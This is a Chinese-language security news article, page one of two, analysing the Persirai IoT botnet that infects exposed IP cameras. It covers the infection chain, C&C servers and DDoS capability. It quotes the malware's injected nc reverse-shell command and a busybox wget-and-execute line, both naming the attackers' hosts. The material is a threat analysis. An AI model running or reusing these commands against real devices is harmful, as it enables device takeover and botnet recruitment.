欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

以网络摄像头为感染目标的新型IoT僵尸网络Persirai

来源:本站整理 作者:佚名 时间:2017-05-17 TAG: 我要投稿


趋势科技(Trend Micro)最近发现了一种新型物联网(IoT)僵尸网络,该僵尸网络利用恶意软件 ELF_PERSIRAI.A进行不断传播感染。据分析,目前已有多家原始设备制造商(OEM)的1000多种型号网络摄像头产品受此恶意网络感染,但趋势科技并未透露详细受影响制造商,下一步可能会和相关制造商配合进行感染识别和漏洞修复。这可能是继Mirai和Hajime之后又一波针对IoT设备的新型攻击力量,趋势科技把其命名为Persirai。
趋势科技通过Shodan发现,大约有120,000台网络摄像设备面临感染Persirai的风险,这些设备赤裸裸地暴露在网,极易被攻击者通过其设备80端口入侵Web管理页面,形成感染控制,然而,其设备使用者却对此毫无意识。以下是4月26日的Persirai感染趋势图,从图中可以看出,中国是该类僵尸网络感染的重灾区,仅大陆地区的感染率就高达20.3%。

 
行为分析
通常,在用户内部网络中,网络摄像头通常可以使用路由器的即插即用(UPnP)协议功能进行端口映射,使得用户可以通过广域网远程访问到设备,而这也带来了感染IoT恶意软件的风险。Persirai正是利用恶意软件ELF_PERSIRAI.A,对暴露在网的网络摄像头进行传播感染:

目前,这种攻击的大部分受影响设备由于未更改默认出厂密码或存在弱口令,攻击者通过密码组合进行大规模的自动化入侵登录,进入网络摄像头的Web管理接口后,通过以下注入命令强制摄像设备连接到一个下载网站执行恶意文件下载:
$(nc load.gtpnet.ir 1234 -e /bin/sh)
之后,远端下载网站将会给出以下命令响应,通知被控制的网络摄像头从域名连接ntp.gtpnet.ir处下载恶意shell脚本文件:
busybox nohup sh -c “killall encoder ;wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &
其中, wificam.sh脚本将会下载并执行以下恶意样本文件,并在所有恶意程序完全执行之后,进行自毁删除。

所有恶意样本程序将会在被控网络摄像设备的内存中运行,同时,将会在被控设备系统的/dev/null目录下生成ftpupdate.sh和ftpupload.sh,以阻止0day漏洞和其它形式对被控设备的攻击。然而,如果被控设备一旦执行重新启动操作,也不能消除此类隐患,恶意软件也将迅速对该设备形成攻击。
C&C控制
网络摄像头一旦被感染控制后,将会与以下C&C服务器执行通信响应:
load.gtpnet.ir
ntp.gtpnet.ir
185.62.189.232
95.85.38.103
接收到C&C服务器的响应信息之后,被控摄像头将会利用前不久公开的一个0day漏洞利用模块,自动对其它网络摄像头发起攻击。不论目标网络摄像设备的密码有多复杂,攻击者都能利用该漏洞获取设备的用户密码文件,进而进行命令注入。以下是该漏洞的一个攻击payload:

当然,被控摄像头还能从C&C服务器处接收对其它网络系统的DDoS攻击指令。值得注意的是,Persirai可以利用SSDP包(简单服务发现协议包),不需要执行IP地址欺骗,就能发起UDP方式的DDoS攻击。以下为其DDoS攻击中使用的特殊“后门”协议:

箭头所指部分标明了被控设备与C&C服务器的通信方式,其中包含了攻击命令和攻击目标的IP地址和端口号。
趋势科技发现的C&C服务器使用了伊朗的.ir后缀域名,而该后缀域名由伊朗某研究机构严格管理,只限伊朗人使用。另外,我们还发现该恶意软件作者使用的一些有意思的波斯语言符号:

我们曾对用来分析的被感染设备尝试进行固件更新,但更新过程中,其更新状态却提示当前固件已经是最新版本。如下图所示:

总结
在Mirai轰轰烈烈成为首个感染IoT设备的恶意软件之后,其代码的开源性特点也会成为未来IoT类恶意软件的可用之处。随着物联网时代的到来,网络犯罪份子将会从传统的NTP和DNS服务中脱离开来,使用IoT设备发起DDoS

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载